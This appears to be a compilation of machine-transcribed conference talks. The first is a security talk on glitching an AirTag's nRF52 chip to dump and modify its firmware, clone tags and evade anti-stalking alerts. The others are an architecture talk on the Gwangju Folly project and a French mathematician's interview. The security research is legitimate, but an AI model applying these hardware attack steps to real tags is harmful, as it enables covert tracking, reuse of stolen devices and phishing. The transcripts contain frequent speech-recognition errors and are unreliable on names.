more interesting to dump the firmware than to put our own on it. And luckily, thanks to limited results, great work, we can just use fault injection to re-enable it. Now, what is fault injection? Usually when you take the power supply to a chip and you drop the power for a very, very short amount of time, you can cause a kind of memory corruption in the chip. And sometimes this will allow you to skip over instructions, sometimes it will allow you to corrupt memory reads and so on. And so it's kind of difficult to understand really what it does in the chip because you can't really look into it while you drop the power for a couple of nanoseconds. But you can get a relatively stable attack using this kind of approach. And so the basic idea would be that during the start of the processor, at some point in time, the processor will check whether the debugging is disabled. And if so, it will skip the step of enabling the debug hardware. Now, if we manage to perform a fault injection attack at just this moment in time, we might be able to trick the chip so that the chip will enable the debug hardware because we skip, for example, over the check instruction. Now, how do we do this on the NIF-52? In general, most microcontrollers have an external power supply and then an internal power supply that is derived from that external supply. And so, for example, in the case of the NIF-52, the chip normally runs at 1.8 volts, but then on the inside of the chip, those 1.8 volts are converted to different voltages for different peripherals. And so, for example, the CPU core might run at 0.9 volts or Bluetooth might run at 1.2 volts. And the problem is we only really want to attack the CPU core. We only want to attack the actual instruction. We don't really care about Bluetooth and so on. And we want to be careful to not disrupt other parts of the chip too much because then it might happen that something else fails and resets the chip and so on. And so, we want to target only the CPU core, if possible. Now, these regulators tend to be quite noisy. And so, to reduce noise, often the chip has an external connection for what's called a bypass capacitor. A bypass capacitor is a small capacitor that is directly connected to this internal voltage rail to stabilize the voltage towards the CPU core. And you might already notice, but one side of the capacitor gives us direct access to the voltage supply of the CPU core. Now, if we attach, for example, a switch towards ground to it and we press that switch, we will create a short circuit that will disable the regulator. We basically suck all power out of the regulator. And by that, we can interrupt the power supply towards the CPU core. Then if we open the switch again, we re-enable power. Now, obviously, with a manual switch, we can't get the precision and the timing that we require to hit just the right instruction. If we, however, connect a MOSFET to it, which is just an electronic switch, basically, we can digitally control the CPU core power supply. And now we can use something like an FPGA to control the power supply and time it very precisely. Now, I like to go cheap on these kinds of attacks and always show just how easy, for example, fault injection is. And so I decided to use a Raspberry Pi Pico to perform this glitching attack. And so basically, I connected the MOSFET to a Raspberry Pi Pico. And now if the Raspberry Pi Pico enables one of its IOs, it will interrupt the power supply to the CPU core. And then if you turn it off again, the CPU core will start again. And so if we hook this up to the attack, we basically first need to find that bypass capacitor. Now Apple was nice enough to put that capacitor on the backside, and so the easily accessible side of the attack. And even better, they even put a test pad right on that core power supply pin. And so we can just solder on a cable there, connect our MOSFET to it, and we are almost ready to go. Now, fault injection, in most cases, is not something that you just try once and are successful, but in most cases, you want to try a ton of times and eventually you are successful. And because each attempt is really short, like let's say 100 milliseconds, we can try 10 times per second. And so even though we try 100 times or 1000 times, we still get our desired results pretty quickly. Now to be able to restart the attack and to also get a signal when the attack is actually booted, we also want to connect the NI-52 power supply towards the Pico. Because basically the attack runs at 3 volts from a battery and it takes a couple of milliseconds for the power supply to reach the NI-52. And so we want to make sure that we get a signal on our Raspberry Pi Pico once the chip starts booting so that we can time our fault injection attack just right. To do this, we basically use a level shifter to convert the 1.8 volts from the NI-52 to the 3.3 volts that the Raspberry Pi Pico expects on input. And then all we have to do now is power up the attack. And you can do that by just connecting an IO directly to the battery contacts of the attack. And so what we can do now is we can turn on the attack from the Raspberry Pi Pico. Then we wait until the power supply to the NI-52 is enabled, which is basically the point in time at which the NI-52 boots. And then we can perform our fault injection attack using the MOSFET connected to an IO. And now all we need to do is also connect an SWD programmer that we will then use to check if our attack was successful. And so basically we start by just turning everything off. Then we turn on the power supply towards the NI-52. We wait for the signal from the NI-52 power supply. And then we wait a short amount of time. And then we enable the MOSFET, which will drop the CPU core power for a very short amount of time. And then we re-enable it. And then we use our SWD programmer to check whether we are successful. Now this sounds like a lot of complexity and a lot of work, but it's really, really easy. And so for example, the code on the Raspberry Pi Pico is just these couple of lines. Basically we power cycle the target and we wait for the NI-F power to boot up. Then we wait for a configurable amount of time. And then we glitch for a configurable amount of time. And if you set this up on a real attack, it will look something like this. And so we have our attack in this case in kind of a breakout state to make life a bit easier. Then we have a debugger, which is basically the programmer that we use to check whether our glitch was successful. And then we have this breakout board that I designed, which is really just a Raspberry Pi Pico with a couple of level shifters and so on to make life easier and also with the glitcher on board. Now as you can imagine, the boot of the NI-F32 takes quite a long time. And so finding just the right spot in time where we drop the power to attack it is pretty difficult. But exactly for us, limited results documented pretty well with a power trace at which point in time of the boot of the chip we need to glitch. And so in his blog post that you should check out on limitedresults.com, he precisely describes at which point in time we need to drop the power for a very short amount of time to re-enable the debugging interface. And after setting this all up and using a glitch width that I knew is successful from the past, we are ready to go. Now if we look at this on our oscilloscope, you can see that our glitch is not really precise. This is because the code that I'm using to glitch it is very unprecise. But as it turns out, this is enough. You will get lucky eventually just because the likelihood is that if you try often enough, you will hit the right point in time. To control the glitcher, I wrote a simple Jupyter script that basically just sensed the delay and tries a range of delays, tries a range of pulls width basically for the glitch, and then just checks whether JTEC is enabled. And so I let this run for a bit. And after a couple of minutes, I got lucky and I got this success. And success means that basically JTEC was re-enabled. The test JTEC functions in the Jupyter notebook test whether it can connect via SWD to the chip and in this case, that was successful. And suddenly on my hard drive, I found this. My script automatically dumped all the interesting areas of the chip. And so we had the flash dump, the BP, ROT ranges, FICR, UICR, and so on, all the interesting ranges that are in a chip. And so I started analysing the RTECH firmware. I started by just running strings on the firmware and I immediately recognised these strings here. This is an indication that they actually run core crypto, which is Apple's crypto library, on the RTECHs. And the next thing that jumped to my eye was this URL, found.apple.com.slash.RTECH. This is the URL that you get when you NFC scan an RTECH. It will lead you to a URL with the PID encoded in the URL. Now I was really curious to see whether the firmware had any additional validations that I didn't know about. And so I tried to modify the URL in a hex editor and reflash the firmware to the RTECH. And then I got this. And so what do you do when you can change the URL of something to whatever you like? Obviously, you try to rig role people with an RTECH. Now you might wonder, well, why would you go through all of that effort to rig role people? And I had a ton of YouTube comments ask exactly that question. Hey, why aren't you just using an NFC sticker and so on? But the goal with this was really just to see whether the firmware has any additional verification methods. And this was the easiest way to check whether we can just modify something. Because it's very visual. You just tap it with your iPhone and you know whether you are successful. But continuing analysis of the strings output, I found this line here. And I recognize these letters because in the iPhone, this is exactly the serial number that I saw in the Find My application for this RTECH. And so it turns out that we can also freely edit the serial number of the RTECH. And so for example, mine is now stack smashing. And this is pretty interesting because I personally expected the configuration to be in the U1 or on the SpyFlesh also. But apparently all the configuration details of the RTECH are stored in the NRF 52 internal flash. And that brought up a pretty interesting question because after pairing, for example, you can also see your sensor email address and so on all in the RTECH firmware basically. And this brought up the question to Leonard and me whether we can actually clone an RTECH. And so our idea was that I would dump a configured RTECH, send the flash dump over to Leonard. He would flash his RTECH and we would check whether, you know, my RTECH would be discovered in Belgium where Leonard lives. And so we set this all up. I had my RTECH nicely set up at my home place. I dumped the RTECH, I removed the battery, I sent the firmware over to Leonard. And what do you know? A couple of minutes later, my RTECH was suddenly in Belgium. And so it somehow in a couple of minutes traveled a couple of hundred kilometers. And so it works. We can clone an RTECH. All data that is required for cloning an RTECH is in the NRF 52 flash. And this is pretty interesting because this also means that if you, for example, find an RTECH or steal an RTECH, you can actually reset it and create and set it up with a new serial number bypassing the lost function and so on and so forth. And neither the spy flash nor the U1 seem to be really involved in the pairing of the RTECH. And so that was pretty interesting because we all were pretty sure that Apple would do some crazy stuff with the U1 or so to make life of cloning and stealing and so on a bit harder. And I'm curious what this will mean for, for example, bikes that have the find my technology integrated. Now with this information, we also started comparing our two dumps. And so we basically started comparing what is different between different attacks and what changes with the pairing. And for example, here in the hex dump, you can see my email address, the sensor version that is shown when you find the attack and so on. And overall, the information that is part of the pairing is relatively low and you still have a bit of room in the firmware to, for example, integrate your own custom payload into the RTECH. And one thing that got a lot of buzz surrounding the RTECHs was its privacy protections. A lot of people were very afraid about getting tracked by an RTECH. Now while I get the idea of being tracked, I personally think that the RTECH is a terrible tracking device. It doesn't have a microphone, well, a real microphone. It doesn't have GPS. It doesn't have a GSM. The only thing that you have is Bluetooth and the location of an iPhone that walks by. And even there are some limitations. And I mean, if you go on to Alibaba also, you can get a decent tracker with all of these features like GPS, GSM, microphone and so on for $20. So it's even cheaper than an RTECH. And it's not like an RTECH is particularly small or particularly well to hide. And so what I'm about to show is I don't think it's really an issue because I don't think the RTECHs are a great tracking device. But basically, the RTECH has a couple of privacy protections to prevent people from just putting an RTECH in your backpack and being able to track you. If you have an iPhone and an RTECH moves with you for an extended period of time, your iPhone will give you an alert. And so you will get a pop-up saying, hey, an RTECH has been following you and then you can get that RTECH to play a sound. And from my research, this seems to be based on the ID that is broadcasted by the RTECH that changes regularly. Now knowing that this ID is generated in the NI-52 code and knowing that I can modify the original firmware, I wondered what if we make our RTECH have multiple identities. And so basically, instead of having one identity on my RTECH that would change its ID every, I don't know, 24 hours, what if I have a lot of identities and I would basically cycle through them relatively often. And the iPhone would think every time that this is a different RTECH and it wouldn't detect that the RTECH is following me, basically. And so to implement this, I needed to do some further firmware modifications. But for that, we first had to actually analyze the firmware. And so I started loading the firmware into Ghidra and found that it's really standard NI-52 code. It uses the normal NI-52 SDK functions. And so that is pretty cool because it allows you to create signatures from the original NI-52 SDK and then apply them to the RTECH firmware, making your life much easier and you don't have to reverse engineer everything. Also what was interesting was that no runtime mitigations or hardening was found. And so for example, there are no stack canneries and so on. And so if you find something like a buffer overflow, it's most probably relatively easy to exploit. But overall the firmware was relatively straightforward to reverse engineer and so on. And so the idea of building these privacy protection bypasses was relatively easy. And unfortunately, after a couple of experiments, I had my custom firmware ready, it did not trigger any privacy warnings in our testing on iOS 14.5, tested this with a couple of iPhones, with a couple of people walking around. But it also has very limited usability because to manage those identities is kind of difficult because you know, the Find My App only supports 16 attacks at once and so on and so forth. And I also decided to not publish the details on this firmware yet until this is fixed one way or the other. And the reason for that is that after publishing my first YouTube video about the attacks on the RTECH, I got a lot of emails like this asking me whether it's possible to bypass the warnings and a lot of people actually offered me money to bypass those protections. And so given that there seems to even though I think the RTECH is not a great tracker, I don't want to be the person that enables people to track others using the RTECH. But another thing that a lot of people wanted was changing the sound of the RTECH that the RTECH makes when you search for it. Now sound reverse engineering is kind of fun because normally when you reverse engineer something in a firmware, you need to use either Pro, Gidra, Binary Ninja or Radar or so. But for audio, it's really nice to just load it into Audacity because in most cases, the firmware will have raw sound samples contained in it. And if you look into the Audacity menu, you can find that it has this point called import raw data. And there you can just experiment with different encodings, byte orders, channels, sample rates and so on. And eventually you might see something like this. And if you look at the center here, that looks a lot like valid audio. And indeed if we play it back, just this part in the middle, you can see that this sounds a lot like the noises that the RTECH makes, just a bit shuffled around and so on. And it turns out that the audio player is kind of this small sample player where you have multiple samples that create one sound and so on. It was kind of a surprising amount of work to reverse engineer it and get it working nicely. But after a while, I had this wheat setup ready. And by the way, at this point, again, thank you to Colin Oflin and Leonard who did a ton of reverse engineering on this and again, without whom this would not have been possible. And so this is the regular sound that the RTECH makes. And here's my RTECH. Now you might be surprised by the sudden stop of the sound here. This is not just because I clicked stop, but also because the RTECH just crashes at this point in time. I'm not entirely sure why, but probably the reverse engineering of the sampler was not yet good enough. But hey, we now have an Apple branded rig rolling device that you can put in somebody's pocket and rig roll them. And so I hope to release some tools for modifying the firmware to do that soonish. Now, another question that a lot of people had towards me is can we use the RTECH as a bug? And the main idea of a lot of people was that, hey, it has a speaker, right? And a speaker is always also a microphone. Well on the RTECH, unfortunately, the, or well, not unfortunately, but luckily, basically, between the microcontroller and the actual speaker, there's an amplifier. And that amplifier has no way to provide feedback to the CPU. And so we can't really measure anything that goes on in the speaker. However, what we do have is another tiny device over here, which seems to be a Bosch accelerometer. And an accelerometer can measure vibrations. And I mean, what is sound if not just, you know, vibrations? And this is something that is very well known to be possible with accelerometers. But I had never done it. And so I thought this would be a fun experiment to try to use the accelerometer as a microphone on the RTECHs. Now, unfortunately, I could not really get a high speed signal, like not, I don't know, 12 kilohertz accelerometer signal from the accelerometer. And it's also a custom part. Like a lot of websites claim that it's a BMA280, but I don't think it's a 100% match. So for example, the footprint is different, and so on. It seems to be a different, it seems to be a custom chip, which wouldn't be the first time that Bosch has created a custom accelerometer for Apple. And now the problem is the accelerometer is not really sensitive to sound. And so even if you yell against it, you will only get very slight signals. And so I built a very specialized audio chamber for audio testing the RTECH. And so this device, which is totally not a regular Pringles can, is my very sophisticated audio chamber for testing the RTECH and using it as a microphone. And so you basically put the RTECH on the bottom of the chamber, because that's where, especially the deep vibrations, will be very, very significant. And that's needed because we have such a low sample rate that we only can get the low end of the spectrum, basically. And after a couple of tries, a ton of post-processing of the signal, this is the sound that I got out of the RTECH. I don't know if you want to call that a success. So I personally think that the Apple RTECHs are not really a great microphone, but I can tell you that I had a ton of fun trying to get this working and trying to use the RTECHs and its accelerometer as a mic. Now last but not least, let's talk about the U1. Now as mentioned, the U1 so far was only available on higher end devices such as the Apple Watch and the iPhone. But now it's available for a really cheap price or well, cheap PISH price. And it seems that during pairing, the firmware is transferred from the iPhone towards the spy flash of the RTECH. And then the U1 firmware is loaded on demand towards it. And what's really cool on the RTECH is that you can downgrade it. We have full code execution on the RTECH. You don't need a jailbreak. You don't need to have an up-to-date iPhone exploit no matter what updates are coming to the RTECH because the fault injection attack is unfixable. We will always be able to inspect what's going on with the U1 on the RTECH. And we can create breakup boards for it and so on. And I'm really excited to finally have cheap U1 and ultra-wideband research for the Apple ultra-wideband ecosystem. And if you want to learn more about the U1, check out Yiskas and Alexander Heinrich's DEF CON talk this year who are talking about the U1. Now we also were able to create a full diagram of the Apple RTECH. David Hulton polished each layer of the RTECH PCBs and then we reassembled it in an image processing software. And now we have each layer of the PCB. And so this makes it really easy to trace, for example, the connections towards the U1 and so on, and makes life much easier when you just want to sniff a certain line and so on and so forth. If you want to learn more about all of these things, the Glitcher is open source on my GitHub. The reverse engineering details from Colin are published on his GitHub. And I also have a repository with all the hardware pictures and the high resolution PCB pictures that allow you to very easily see what communicates with what and how does everything work. I hope you enjoyed this presentation and if you have any questions or comments, please don't hesitate to contact me on Twitter or via email or whatever. And I hope you enjoyed DEF CON. Thank you.
|
Apple’s AirTags enable tracking of personal belongings. They are the most recent and cheapest device interacting with the Apple ecosystem. In contrast to other tracking devices, they feature Ultrawide-band precise positioning and leverage almost every other Apple device within the Find My localization network. Less than 10 days after the AirTag release, we bypassed firmware protections by glitching the nRF52 microcontroller. This opens the AirTags for firmware analysis and modification. In this talk, we will explain the initial nRF52 bypass as well as various hacks built on top of this. In particular, AirTags can now act as phishing device by providing malicious links via the NFC interface, be cloned and appear at a completely different location, used without privacy protections that should alert users as tracking protection, act as low-quality microphone by reutilizing the accelerometer, and send arbitrary data via the Find My network. Besides these malicious use cases, AirTags are now a research platform that even allows access to the new Ultrawide-band chip U1. REFERENCES: LimitedResults nRF52 APPROTECT Bypass: https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass/ Positive Security’s Send My Research for sending arbitrary data via the find my network: https://positive.security/blog/send-my Colin O’Flynn’s notes on the AirTag Hardware: https://github.com/colinoflynn/airtag-re
|
10.5446/54008 (DOI)
|
Thank you, An-Lin, and thank you, Nicholas, for the introduction and for the generous invitation or hosting this evening tonight, which for us is a very interesting situation because we will talk about public space, of a project related to public space in an area which is very far away from Berlin in South Korea, and we are trying to give some insights in what we did in Guangzhou. At the same time, we are launching a book on Guangzhou 42. You see here the book. I'm also very happy to have Markus Weisbeck, the designer, and Sunar Choi, who developed this image together. And in a way, what we are trying tonight is to have a mixture between some presentations that give examples of what we think interventions in public space could be today. On the other hand, it's kind of insight or readings from the book. And of course, some of you might probably question what is a folly. It's a slightly obscure word, which refers, of course, on the one hand to its etymology, to the French word folly, like craziness, fullness, and which somehow from these origins in the late medieval times led to a number of texts, microarchitectures, and artworks partly related here to literature, one of the famous texts of first notions when the folly of the folly was introduced here by Erasmus, the praise of the folly, text that basically highlights the intelligence of what other people or most people would define as foolish or as something that is slightly on the side or problematic in terms of an everyday knowledge. So this book introduced the notion of the folly, which later on was somehow had a kind of physical outcome in examples like Bommazzo in Italy in the 16th century with a very extravagant architecture that actually also criticized or questioned certain ideas of reason, which was of course a very strong idea in what we define as the circumscribed as the Renaissance. And here another example, the famous Amour de la Reine in the Park of Versailles, which is a kind of fake small farm where actually animals, role-played almost, farmers were actually played by actors. And so there was a very strong relation actually to the landscape. So the folly was actually used as a typology, as a physical product, rather within the context of parks of the English landscape garden, but also here close to Paris. Then to a certain extent I'm really rushing through a history which is much more complex, so it's totally inadequate, probably, what I'm trying to do here. But in an interesting way the idea of the folly came back in what could be defined as a post-modern discussion in architecture here with Hans Holler and with I think a very interesting statement which basically questions ideas of function. So there is a notion of functionlessness in the folly of the post-modern era. We'll see I think in Felicity Scott's contribution that the story of course has another story just in front of it with Philip Johnson and some other protagonists of what later became post-modern architecture. So the situation was working in Guangzhou in South Korea, a very particular one, because the Guangzhou folly project is basically a third format next or besides the Guangzhou art biennale and the Guangzhou design biennale. And both of these biennales happens in a gallery, like in a really protected environment where the amount of control is almost as maximum. The idea of this third format, Guangzhou folly, was to work in public space. And public space in Guangzhou is a very loaded case because some of the origins of the Guangzhou biennale of almost what you could define as the kind of funding myth of the Guangzhou biennale is the Guangzhou uprising in 1980, May 18, which was the beginning of the democratization process in South Korea. And it was an uprising started by students, protests, and joined by citizens of Guangzhou who took over the city for a couple of weeks before the South Korean army came in, certainly under very, well, helped quite considerably by the CIA. But this later on became very much a kind of founding myth of South Korea, of democracy in South Korea, but also a very strong element in what cultural practice is in Guangzhou. Today, of course, more than 30 years later, you see this history rather as a history that is petrified or took forms of memory politics here, a monument on a cemetery, or one of the elements that I found quite interesting when I first came to Guangzhou was this inscription in a pavement in the main street of Guangzhou, which is called May 18 Street. And it defines this street as a UNESCO democracy and human rights street, which of course is something very, to say the least, a bit absurd in a way. So there is a very strong relation to the idea of activism, of revolt, of risks taken by citizens. On the other hand, what we're witnessing now is a history of memory politics of something that is solidified and petrified over time. So this was a bit of a starting point where we thought would be interesting to use the notion of the folly as a physical product, as an object that would somehow negotiate a field between certainly an aesthetic autonomy, but on the other hand, a potential of rupture of political participation. And this was somehow the invitation to eight different groups of artists, architects, and writers to basically think about interventions that would reflect that situation and also the problem of what we call public space. And I think none of us actually know what public space is, I guess. And we will now try to give you a very brief overview. And because this, as I said before, we are launching here also the book again. The book, of course, is something that tried to contextualize these interventions that we did in Guangzhou. It was an attempt to read the discussion of the folly of physical interventions in public space within a broader context, partly in a very historic way with texts by Breda Kamp and Barry Bagdoll and some other scholars, but also with rather recent examples that somehow investigate the notion of public space. And this is a bit the situation here. You could read the kind of inventory of the book. And we invited eight different teams. And there was a first edition of Guangzhou folly, which was at that time part of the design Biennale, which focused entirely on architects. What we decided this time was to invite slightly more complex teams, maybe also considering that maybe architects are not really the specialists of public space. There might be others who could make a contribution. And so therefore, we, for instance, had quite often a combination between an architect and a writer, for instance, in the case of Ram Kholhas and Yngo Nierman, but also with David Arjai and Thayas Alassi. Or we invited artists, collectives, who had a very particular approach to the idea of the public. So in a way, we were interested in teams and in people we invited who could, well, this was a hope that we had. And I think we were, it came across in the end, people who would actually propose questions that are certainly not answers to what public space is, but rather arguing and maybe rather proposing questions and making also a kind of provocational statement, which in that sense also refers to the, to this idea of the folly, which is maybe rather rupture with societal norms and less focused on consensus. And I think this is a notion that we will hear much more about later when Ayyal will speak, this tension between rupture, revolution and consensus, because this is a bit the field in which we were trying to act. I think Philip, you would probably take over from here and explain a bit what our artists and architects and writers did. Yeah, all of the invited teams were obviously, we selected because of their sort of modes of working and their previous history of working and all of them, or I think except one, were in Guangzhou for the very first time. So maybe for artists or some of you as architects, it's a normal mode of operation. But for us, this kind of possibility to invite outside viewpoints, creating a kind of collision between an outside perspective and the very specific sort of history of Guangzhou seemed to somehow allow us to explore this kind of condition of folly. Nicolas already talked about rupture, so we consider that as very positive and constructive. And Nicolas already mentioned this idea about transdisciplinary of extending in a way the creating a kind of cross disciplinary inquiry into public space as being one of our main one of our main cultural strategies. And the second one I would call site specificity and decontextualization, meaning this kind of inherent property of follies also from looking back in history as being partly sort of placed in a certain specific context, but partly actually seeking the rupture of that context. And a good example is the first folly I want to introduce. I mean, I'm going to introduce actually very briefly now the eight follies and I'm going to have to do this very quickly. So I'm spilling all the beans and and they're all very complex and exciting projects and but I have to be very brief. Anyway, this one is the first by Ai Weiwei. And he's actually he's actually sort of picking on a very specific tradition in Guangzhou of Poyang matches, which is which are public food, which are food carts or tentent wagons, which are serving residents of Guangzhou in the public space. And they actually played a very specific role also in the May 18 demonstrations, serving the demonstrators while they were being besieged from around from army. And but right now the status of these Poyang matches that was in a crisis because there's a policy of cleaning up public space. And so the these sort of informal economies have a very sort of fragile existence constantly trying to negotiate with authorities and actually only having certain places, only two places left in the city where they sort of semi legally exist. And Ai Weiwei picked up on this tradition of and and actually sort of began to use the sort of autonomous space that he has when he comes to Guangzhou and designed contemporary Poyang matcha, which could not somehow be challenged by the authorities. And here it is. It was actually manufactured in Beijing because Ai Weiwei cannot travel to Guangzhou and shipped over to Guangzhou and is now sort of used by different actors in the city and traveling around the city and deliberately sort of stepping over the boundaries of the legal kind of zones where Poyang matcha still are allowed to exist. I'm coming to the next strategy, which I would call useful and useless. Again, this kind of ambivalence, which we find is characterizing the notion of folly. It's actually, I mean, just a little bit more of the background. I mean, the word folly does not translate into Korean, which is a great, I mean, which is sort of a weird situation. But we thought at the end it was a kind of productive misunderstanding because the city has to pay for these not particularly cheap public space interventions, these of agendas of beautification of public space, whereas we are somehow bringing in, hopefully you agree, a kind of different tradition, intellectual tradition that's connected to folly talking about raptures, et cetera. So these are two completely different understandings which also, I think, you can understand this kind of misunderstanding when it comes to use and uselessness. So the city was thinking about a particular use and purpose of these kind of follies, whereas many of our protagonists and folly builders were actually deliberately trying to evade this kind of instrumentalization and creating raptures rather than simply being useful. This one is a project by David Adjaye and the writer, Thayus Elassi, from Ghana, which is currently based now in Rome. They collaborated on what they called the Guangzhou River Reading Room, which is a very large, quite large structure, creating a new possibility to descend from the embankment walls that frame this kind of central river in Guangzhou and take you down into this kind of wilderness of flatlands which twice a year during the rainy season completely floods and also will bury this bottom part of the structure which is executed in concrete underwater. Thayus Elassi actually proposed a library to fill in these kind of shelves which will be managed by a local library in Guangzhou, so you could use it as a kind of reading space, but you could also do other things there. The third project is by the artist collective, Rux Media Collective from Delhi, who actually, talking about site specificity and decontextualization, it's very interesting that they as a Delhi artist collective actually introduced us to the text by Erasmus from Rotterdam, which they had found buried in European history and then worked with it in Delhi and now took this concept to Guangzhou, which is Erasmus, I mean I have to explain a tiny bit more, Erasmus of Rotterdam was actually writing this very important text in praise of Folly, which is a description of eight chapters of a madman on a horseback riding through medieval Europe and ranting about the Catholic Church. So somehow through being disguised in a way of putting a mask on as a madman, he was able to say things about the Catholic Church in medieval Europe that otherwise you probably would have been beheaded for. So they used this kind of concept and actually designed a, tried to sort of research also, kind of corresponding elements in Korean tradition of satirical theatre and transformed one of the underground compartments of the Guangzhou underground into a kind of a margitive journey by Erasmus of Rotterdam. Here you see this kind of transformed compartment and every now and then there are public performances with masks relating to Korean tradition that we'll talk about kind of the function of satire. Another project by Doho So and his brother Erso, who is an architect, is actually, has designed a kind of mobile hotel which criss-crosses the fabric of Guangzhou and finds openings and gaps to slot in and it can be rented for a night. So it constantly kind of travels and moves location. Here it is on the move. And another project which I think also illustrates this notion of useless and useful is the project by the Danish artist group Superflex. It is part of a series of projects they called Power Toilets. I think it's the third one and it replaces actually a very rundown dilapidated toilet but it does so by recreating literally the interior of the UNESCO headquarters in Paris. This is actually, I mean, it sort of recreates the 1980s bad sort of refurbishment of the Maserbräuer building that was the original. So here it is, I mean, and the tiles and the sinks and the urinals were all shipped over. They tried to kind of source the originals and they are providing a kind of very obvious simple kind of engaging as opposed to public function for the citizens but at the same time making a quite sophisticated commentary on the sort of desperation with which Guangzhou also lobbies for UNESCO support and builds UNESCO World Heritage into their city branding etc. So this is the public toilet in the center of Guangzhou from the outside. It's just a simple box. And now I'm coming to the fourth curatorial strategy, if I could call it like that, which we call Participation Agency. And sort of using Rem Kolas as Niko Niermans' folly to explain what we mean by that. So we, Nikolaas already told you about this obviously very oppressive tradition of Citizen Revolt, which Guangzhou stands for. But at the same time, you know, it is now a city which is completely depoliticized. There's a sort of fatigue in public space. You can feel it when you're there. And so we asked ourselves, what does it mean to do a kind of project on the political sort of dimension of public space 33 years after this initial revolt in a city that has so intensely sort of branded this tradition that it was becoming very sort of solid and sort of sterile. And so Rem and Niko actually asked, very simple in a way, or moved to this very obvious and but very contested field of public participation and proposed a new form of infrastructure for this in public space. And it's a very simple infrastructure, which you will see in a second where you are asked a certain question as a passerby wandering through the center of the city and you get three different lanes to choose if you want to answer yes or maybe you'll know. And the answers are then recorded on the structure itself, but also in an online archive. And most importantly, the questions are being changed every two weeks and they're formulated by a local NGO. So this was the scheme and this is how it was realized. This is a question, the very first question that was asked a couple of weeks ago, do you support public plastic surgery? And here you have a woman who obviously does. And I'll show you a very quick film about that. Okay, so there it is. I will, I'm almost finished. So here it is how it's then sort of engaging with certain kind of complication technologies and also you can follow the questions. So we felt it was a very brave thing to some of place, a very obvious simple kind of profilist participation device into public space and it's since these follies are supposed to be permanent, there's bound to be a very critical situation coming up very soon. And this is the seventh folly actually offering certain storage possibilities under the roundabout which was featured in an earlier slide which was the main site of the demonstrations in public space and this is the folly, the eighth folly which a YAL Weizmann who collaborated here with Samane Moafi will introduce to you in person later on tonight.
|
Nikolaus Hirsch (director), Philipp Misselwitz (co-curator) present their curatorial approach for Gwangju Folly II, which uses the ambiguities of follies as a tool of inquiry to address the many notions of public space. The transformative potential of public space has recently been etched into public consciousness during the uprisings in the streets and squares in many cities around the world.
|
10.5446/54145 (DOI)
|
Je suis en séance chercheur à l'université de Picardie-Jules Verne en mathématiques. Je suis président de la société mathématique de France depuis peu, donc ça fait six mois désormais, depuis juin 2020. Donc mon domaine de prédilection, c'est une espèce de mélange de systèmes dynamiques, théoragogiques, et de la formatique théorique. Pour faire simple, je m'occupe de suites infinies, de termes appartenant à un ensemble fini. On peut voir ça comme un modèle qui permet de représenter pas mal de situations très variées. Et ça donne aussi la chance d'utiliser pas mal d'outils mathématiques différents, de travailler avec des collègues qui peuvent venir de la géométrie, mais c'est un dynamique défini sur des surfaces par exemple, des collègues qui font la décidabilité sur des questions de décidabilité d'isomorphisme entre systèmes dynamiques, donc des gens qui font de la formatique théorique, qui manipulent les logiciels. C'est un domaine que j'apprécie, que j'avais choisi lorsque j'avais fait mon DEA, à l'époque, c'est-à-dire mon Master 2, à Marseille, parce que c'était Gérard Rosy, figure emblématique du développement de cette discipline, qui s'appelait les maths discrètes, qui s'appelle toujours les maths discrètes, autrefois il y a eu pendant un certain temps des maitrises de maths discrètes en France. Maintenant, en gros, il n'y a plus que des maths purs ou des maths appliquées, c'est un peu une dénomination qu'on a un peu perdu, ou l'essai à l'informatique, qui est un peu dommage. Et auparavant, avant d'arriver à Marseille, j'étais à Arrince, où, rentrant à l'université, j'avais prévu peut-être prof de sport. Mais je dois dire, et ça, c'est quelque chose que j'aime bien dire, que ce qui m'a plu, peut-être même avant les mathématiques, parce que les mathématiques, j'ai découvert vraiment l'université, c'était l'université. J'ai adoré l'université. Le fait qu'on soit noyé parmi 150 élèves, qu'on nous fiche une paix royale, que l'on ne nous mette pas le doigt dessus lorsqu'on n'a pas rendu son devoir, et bizarrement, ça m'a fait travailler beaucoup, beaucoup, beaucoup plus. J'ai beaucoup apprécié l'université et sa bibliothèque. C'est un truc que je conseille lorsque je parle à des élèves qui s'interrogent sur leur orientation. J'en redis d'aller à la bibliothèque, il y a absolument tout. Dans les villes, c'est la plus grande bibliothèque de science en général, hors Paris. Mais voilà, c'est un lieu calme. Je vais déjà amener les élèves de banlieues difficiles comme Creil dans la bibliothèque de mon université, l'université Pierre du Vulverne, ils ont halluciné. C'est assez rigolo. Ils se sont demandé pourquoi il y avait autant de gens qui ne faisaient rien et qui ne faisaient aucun bruit. Et ça, c'est ce qui m'a plu à l'université. On se calme, on prend des livres, on les remet, on fait nos exercices. Et puis, bon, maintenant, ça fait 30 ans. Je suis devenu président de la SMF suite à la sollicitation du précédent président, Stéphane, Sere. Je l'en remercie. Moi, je n'ai jamais été chef de classe. J'ai dû réfléchir un certain temps, plus d'un an, à la proposition de Stéphane, mais je ne pouvais pas de certaine façon refuser, lorsqu'on bénéficie d'un environnement qui est dirigé par une personne et qui fait qu'on peut progresser dans un domaine qu'on adore, les mathématiques, être dans son bureau, etc., de nous donner toutes les conditions de travail nécessaires à s'épanouir. Lorsque c'est à son tour de participer à cela, à le faire, on ne peut pas refuser. Moi, je suis footballeur dans l'âme et faire des passes, marquer un but. Quand on a même marqué des buts, il faut aussi savoir faire des passes. Je vois un peu mon rôle de président de l'ASMF un peu comme ça. J'aime bien les oeuvres collectives. C'est à mon tour, alors je vais le faire avec enthousiasme. L'ASMF est une vieille dame, parce qu'elle aura en 2022 150 ans. Nous ferons une conférence en son honneur à ce moment-là. Ce sera en mars 2022. Ces missions ont évolué, mais au départ, on s'est devenus rapidement une maison d'édition. Nous avons des collections qu'il faut savoir faire évoluer. Mais petit à petit, on va dire peut-être les 30 dernières années, suite à de nombreuses initiatives des présidents précédents, ou de collègues qui avaient ces idées, on s'est ouvert aussi aux grands publics, au monde des collégiens, lycéens, ou toutes ces personnes qui aiment les mathématiques, mais n'ont jamais eu envie de faire des études. J'en profite pour dire que c'est bien dommage maintenant avec l'arrivante Dubac que ces personnes n'aient plus accès aux sciences mathématiques en première et en terminale. On a des cycles de conférence, très nombreux cycles, qui s'adressent essentiellement au lycéen aux étudiants et aux grands publics. Plus récemment, et j'en suis assez content parce que j'avais été utilisateur de ces programmes, Math C2 Plus, qui nous permet de couvrir un spectre encore plus large, puisque ça s'adresse à des collégiens. On a un spectre de diffusion des mathématiques qui va du milieu professionnel, la publication, les anas de l'ONS, on a le 